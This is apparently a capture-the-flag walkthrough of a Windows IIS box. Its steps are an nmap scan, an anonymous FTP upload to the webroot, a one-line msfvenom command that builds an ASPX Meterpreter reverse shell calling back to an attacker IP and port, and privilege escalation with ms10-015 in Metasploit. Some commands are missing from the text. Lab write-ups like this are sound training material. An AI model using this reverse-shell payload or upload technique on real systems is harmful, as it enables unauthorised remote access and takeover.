Port Scanning and General Enumeration (Nmap)
Initial scan shows ports 21 (FTP) and 80 (HTTP) open.
The target scan shows us that Anonymous FTP login is allowed and it looks like the webroot.
Logging in to FTP with the creds anonymous:anonymous we can put a file and see if we can access it from the browser. I wrote a simple htm file that says
Access (FTP, metasploit, msfvenom)
Things we know:
- We can access a file that we place on the FTP server
- We’re working with Microsoft IIS so we’ll probably need an asp or aspx file
Let’s craft some shellcode using msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4444 -f aspx > shell.aspx
Set up a listener in metasploit and access our shell in the browser
Privesc (metasploit, ms10-015)
Well, we’re on the box but as a low priv account. Let’s change that. Background the shell (bg) and:
Looks like there’s a few we can try. Let’s try
Make sure your settings are correct and fire it off.
That’s a better account! Capture the flags